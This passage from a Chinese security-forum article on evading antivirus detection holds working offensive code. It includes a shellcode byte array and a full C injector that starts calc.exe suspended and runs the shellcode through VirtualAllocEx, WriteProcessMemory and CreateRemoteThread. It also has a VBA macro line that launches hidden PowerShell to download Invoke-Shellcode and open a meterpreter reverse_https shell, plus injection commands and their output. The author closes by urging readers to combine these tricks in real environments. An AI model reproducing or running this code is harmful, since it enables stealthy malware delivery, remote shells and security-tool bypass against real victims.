"\x55\x07\xbd\xe5\xfe\xa2\x52\x53\x56\x5b\xca\xfe\x2c\xfa\x13"
"\xd5\x48\x3c\x9f\xdf\xad\xf3\x68\xaa\xbd\xe4\x0e\x54\x3e\xf5"
"\xba\x54\x54\xf1\x6c\x03\xc0\xfb\x49\x63\x4f\x03\xbc\xf0\x88"
"\xfb\x41\xc0\xe3\xca\xd7\x6c\x9c\x32\x38\x6c\x5c\x65\x52\x6c"
"\x34\xd1\x06\x3f\x21\x1e\x93\x2c\xfa\x8b\x1c\x04\xae\x1c\x75"
"\xaa\x89\x6b\xda\x55\xfc\xef\x1d\xa9\x82\xc7\x85\xc1\x7c\x58"
"\x36\x11\x17\x58\x66\x79\xec\x77\x89\x49\x0d\x52\xc2\xc1\x84"
"\x33\xa0\x70\x98\x19\x64\x2c\x99\xae\xbd\xdf\xe0\xdf\x42\x20"
"\x15\xf6\x26\x21\x15\xf6\x58\x1e\xc3\xcf\x2e\x61\xd7\x6b\x20"
"\xd4\x7a\xdd\xab\x16\x28\x1d\xfe";
<span class="n">BOOL</span> <span class="nf">injection</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">wchar_t</span> <span class="n">Cappname</span><span class="p">[</span><span class="n">MAX_PATH</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">STARTUPINFO</span> <span class="n">si</span><span class="p">;</span>
<span class="n">PROCESS_INFORMATION</span> <span class="n">pi</span><span class="p">;</span>
<span class="n">LPVOID</span> <span class="n">lpMalwareBaseAddr</span><span class="p">;</span>
<span class="n">LPVOID</span> <span class="n">lpnewVictimBaseAddr</span><span class="p">;</span>
<span class="n">HANDLE</span> <span class="n">hThread</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">dwExitCode</span><span class="p">;</span>
<span class="n">BOOL</span> <span class="n">bRet</span> <span class="o">=</span> <span class="n">FALSE</span><span class="p">;</span>
<span class="n">lpMalwareBaseAddr</span> <span class="o">=</span> <span class="n">shellcode</span><span class="p">;</span>
<span class="n">GetSystemDirectory</span><span class="p">(</span><span class="n">Cappname</span><span class="p">,</span> <span class="n">MAX_PATH</span><span class="p">);</span>
<span class="n">_tcscat</span><span class="p">(</span><span class="n">Cappname</span><span class="p">,</span> <span class="sa">L</span><span class="s">"</span><span class="se">\\</span><span class="s">calc.exe"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Injection program Name:%S</span><span class="se">\r\n</span><span class="s">"</span><span class="p">,</span> <span class="n">Cappname</span><span class="p">);</span>
<span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&</span><span class="n">si</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">si</span><span class="p">));</span>
<span class="n">si</span><span class="p">.</span><span class="n">cb</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">si</span><span class="p">);</span>
<span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&</span><span class="n">pi</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">pi</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span><span class="n">CreateProcess</span><span class="p">(</span><span class="n">Cappname</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span>
<span class="n">FALSE</span><span class="p">,</span> <span class="n">CREATE_SUSPENDED</span>
<span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&</span><span class="n">si</span><span class="p">,</span> <span class="o">&</span><span class="n">pi</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">bRet</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">lpnewVictimBaseAddr</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hProcess</span>
<span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">shellcode</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span>
<span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lpnewVictimBaseAddr</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">bRet</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hProcess</span><span class="p">,</span> <span class="n">lpnewVictimBaseAddr</span><span class="p">,</span>
<span class="p">(</span><span class="n">LPVOID</span><span class="p">)</span><span class="n">lpMalwareBaseAddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">shellcode</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="n">hThread</span> <span class="o">=</span> <span class="n">CreateRemoteThread</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hProcess</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">(</span><span class="n">LPTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">lpnewVictimBaseAddr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hThread</span><span class="p">,</span> <span class="n">INFINITE</span><span class="p">);</span>
<span class="n">GetExitCodeProcess</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hProcess</span><span class="p">,</span> <span class="o">&</span><span class="n">dwExitCode</span><span class="p">);</span>
<span class="n">TerminateProcess</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hProcess</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">return</span> <span class="n">bRet</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">help</span><span class="p">(</span><span class="kt">char</span><span class="o">*</span> <span class="n">proc</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%s:[-] start a process and injection shellcode to memory</span><span class="se">\r\n</span><span class="s">"</span><span class="p">,</span> <span class="n">proc</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[])</span>
<span class="p">{</span>
<span class="n">help</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
<span class="n">injection</span><span class="p">();</span>
<span class="p">}</span>
注入就举例到这里,思考下如果是hook函数的检测怎么替换呢,可以进行函数替换,比如win api中可以替换VirtuallAlloc的函数就很多:
0x03 技巧组合
上面说了一些技巧,无论是分离中加载器运行shellcode、白利用运行恶意程序,还是将shellcode编码、加密、注入,对免杀都会有一定效果,单一使用某个技巧的话或多或少会有一定的缺陷。
那么将各个技巧结合起来达到最好的效果是我们需要思考的事情
举个好用的例子:
Powershell-Payload-Excel-Delivery
https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/
这是就是使用shellcode调用graeber的VBA宏,在内存中执行powershell(可以使用编码),达到后门持久化
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force", Null, objConfig, intProcessID
C:\PS> Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden
C:\PS> $Proc = Get-Process notepad
C:\PS> Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbose
VERBOSE: Requesting meterpreter payload from https://192.168.30.129:443/INITM
VERBOSE: Injecting shellcode into PID: 4004
VERBOSE: Injecting into a Wow64 process.
VERBOSE: Using 32-bit shellcode.
VERBOSE: Shellcode memory reserved at 0x03BE0000
VERBOSE: Emitting 32-bit assembly call stub.
VERBOSE: Thread call stub memory reserved at 0x001B0000
VERBOSE: Shellcode injection complete!技巧方法是死的,思路是活,希望此文可以达到抛砖引玉的目的,在实际环境下也需要各位师傅将多个技巧结合灵巧的思路达到想要的成果。
文末推个个人博客,欢迎友链
https://www.cnblogs.com/-qing-/
完。
</div>
<div class="post-user-action">
<span class="btn btn-default pull-right" id="mark" data-action="topic" data-pk="7170">
<span id="mark-text">点击收藏 </span><span class="i-seprator"> | </span><span id="mark-count">5</span>
</span>
<span class="btn btn-default pull-right" id="follow_topic" data-pk="7170">
<span>关注</span><span class="i-seprator"> | </span><span id="follow-count">2</span>
</span>
<div class="clearfix"></div>
</div>
<div class="related-section">
<div class="related-box">
<span><a class="pull-left" href="/t/7162" title="Ripstech Java Security 2019 Calendar复现系列(二)"><span class="related-label" style="padding: 3px 4px;margin-right: 3px;">上一篇:</span>Ripstech Java Sec...</a></span>
<span><a class="pull-left" href="/t/7169" title="对MYSQL注入相关内容及部分Trick的归类小结"><span class="related-label" style="">下一篇:</span>对MYSQL注入相关内容及部分Tr...</a></span>
</div>
</div>
</div>
</div>
<!-- topic & appendix -->
<ul>
<li style="min-height: 50px;line-height: 60px;margin-left: 15px"><strong>动动手指,沙发就是你的了!</strong></li>
</ul>
</div>
<!-- posts of topic -->
<div class="row box" id="reply-box">
<div class="box-container clearfix">
<div class="reminder">
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F7170&from_type=xianzhi"><strong>登录</strong></a> 后跟帖
</div>
</div>
</div>
<!-- editor for post -->
</div>
<div class="span3 pull-right offset sidebar">
<div class="box">
<div class="info-panel">
<p><strong>先知社区</strong></p>
<hr>
<p class="text-center login-btn">
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F7170&from_type=xianzhi" class="btn">现在登录</a>
</p>
</div>
</div>
热门节点
<a href="/node/11" style="padding: 4px 10px 4px 10px;word-break: break-all;line-height: 14px;margin: 0 5px 5px 0;display: inline-block">技术文章</a>
</div>
</div>
<div class="box">
<div class="hot-node notice">
<div class="info-body">
<a href="/notice" style="padding: 4px 10px 4px 10px;">社区小黑板</a>
</div>
</div>
</div>
<div class="box sfixed" id="toc-container" style="width: 270px;">
<div class="panel-info">
<div class="panel-heading">
<h4>目录</h4>
</div>
<div id="toc">
<div class="high-light" style="display: block; background-color: rgb(243, 243, 243); position: absolute; height: 26px; top: 154px;"></div>
<ol style="top: 50px;"><li><a href="#toc-0">A)那些加载器执行shellcode:</a></li><li><a href="#toc-1">B)Lolbins白利用加载shellcode</a></li><li><a href="#toc-2">A)shellcode编码混淆</a><ol><li><a href="#toc-3">使用模板和编码器</a></li></ol></li><li><a href="#toc-4">B)shellcode注入混淆</a></li></ol></div>
</div>
</div>
<div style="clear: both;"></div>
</div>
</div>
<script type="text/javascript">
$(document).ready(function () {
voteUp = function (topicPk) {
if (topicPk) {
$.ajax({
url: '/forum/topic/up/',
data: {'pk': topicPk},
type: 'post',
dataType: 'json',
success: function (data) {
if (data.not_authenticated) {
window.location.href = 'https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F7170&from_type=xianzhi'
} else {
if (data.success) {
$('.t-vote > .vote-up').html(data.html);
}
}
}
});
}
};
voteDown = function (topicPk) {
if (topicPk) {
$.ajax({
url: '/forum/topic/down/',
data: {'pk': topicPk},
type: 'post',
dataType: 'json',
success: function (data) {
if (data.not_authenticated) {
window.location.href = 'https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F7170&from_type=xianzhi'
} else {
if (data.success) {
$('.t-vote > .vote-down').html(data.html);
}
}
}
});
}
};
});
</script>
<script src="https://s11.cnzz.com/z_stat.php?id=1260716569&web_id=1260716569" language="JavaScript"></script><script src="https://c.cnzz.com/core.php?web_id=1260716569&t=z" charset="utf-8" type="text/javascript"></script><a href="https://www.cnzz.com/stat/website.php?web_id=1260716569" target="_blank" title="站长统计">站长统计</a>
扫一扫
327
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
